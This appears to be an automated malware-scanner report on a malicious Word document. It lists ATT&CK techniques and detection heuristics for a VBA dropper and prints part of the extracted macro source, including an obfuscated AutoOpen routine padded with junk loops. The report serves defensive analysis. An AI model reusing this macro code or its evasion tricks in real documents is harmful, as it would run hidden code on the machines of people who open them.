MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1137.001 Office Application Startup: VBA
T1071.001 Web Protocols: Web Protocols
This OLE document contains VBA macros, including an AutoOpen macro, which is a common technique for executing malicious code upon opening. The critical heuristic 'OLE_VBA_WMI_PROCESS_CREATE' indicates the script attempts to launch a process using WMI, and the obfuscation of 'winmgmts:' further supports this. The ClamAV detection 'Doc.Dropper.Agent-6966352-0' suggests it functions as a dropper for other malware. The script's intent is to execute a payload via WMI, likely downloading it from a remote source.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6966352-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6966352-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43022 bytes |
SHA-256: 0f9d0799acb3948e55e7fa1057fea3efb63aa7be4cdf4e530160904ca858e1ea |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "B6108955"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "F15429"
Attribute VB_Base = "0{F7AEC335-83AB-407F-BE00-CC619A70DC49}{CD4CF7E8-CE66-4EF7-A1BA-E559BB585E7E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "F3_952"
Attribute VB_Name = "J0536822"
Attribute VB_Name = "N7788748"
Attribute VB_Name = "Z27_83"
Attribute VB_Name = "s9203027"
Attribute VB_Name = "b52_6831"
Attribute VB_Name = "Q825387"
Attribute VB_Name = "i3_6595"
Attribute VB_Name = "q6_83_"
Attribute VB_Base = "0{31E9B1DF-5E8A-4D2E-93FE-DC6493918584}{366CD540-B076-4538-AC65-03CCE723149F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "j21_30"
Function c81166_(o30396)
While G7229771 And O137677
Select Case w8_162_8
Case n64__341
B3680669 = Log(c435613)
z0_6250 = 980366862
T36910 = Int(N3_823 + CLng(U406_19))
Case u2943_65
H17279 = L8488901
d45520 = Cos(153269693)
q1463827 = CStr(330858079)
End Select
Wend
While B128743 And B_071_50
Select Case E60910
Case d1313459
G9184_ = Log(G6461_09)
I319678_ = 642431198
f2483993 = Int(t62976 + CLng(P26357_2))
Case b_5443
z902268 = n_1017
q359981 = Cos(478042632)
W9630337 = CStr(251490308)
End Select
Wend
Set c81166_ = CVar(o30396)
While b8359_1 And k9469816
Select Case J939291
Case l95266
f0441981 = Log(G752_062)
v18899 = 808506213
d910_5 = Int(O2_791 + CLng(j9707758))
Case d2863_89
F86848 = u8218021
n_5532 = Cos(884622483)
m0_0_6_ = CStr(781093032)
End Select
Wend
While G54560 And l0349_
Select Case P24017
Case f542841_
V860278 = Log(N_1716)
N77166 = 354024360
c66504 = Int(d875183 + CLng(i_60474))
Case T04_2221
O85833 = o03059_0
M3_242 = Cos(938899852)
i763_8 = CStr(59754062)
End Select
Wend
While o0492618 And a4_218
Select Case z69525
Case I861905
j892_4 = Log(I2_4097_)
Z_580274 = 375098906
V8021514 = Int(K65138 + CLng(s_16__))
Case z9877_2
a2395683 = a18765
M8_8_45 = Cos(394165218)
Y644239 = CStr(594074891)
End Select
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While r6_73526 And P429_88
Select Case a17584
Case F_73156_
W833845 = Log(W887_5)
s41347 = 666925634
h530895 = Int(N_4431 + CLng(G15470))
Case f86522
H8_139 = d821_71
F6873173 = Cos(739516046)
t82251 = CStr(162195872)
End Select
Wend
While r98693 And U9448252
Select Case Q16756_
Case A055252
n75416 = Log(w35410)
K68342 = 615491629
c1143065 = Int(P2__103 + CLng(M1__240))
Case Y_7_366
o840__6_ = a8417_
j2_14___ = Cos(211022618)
u56636 = CStr(859381382)
End Select
Wend
Call P255599
While c4646973 And S9964348
Select Case u803799
Case o52490
d6_29_7 = Log(A7371070)
V4881110 = 278893779
B7_7933 = Int(i38992 + CLng(o7658__))
Case o028
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.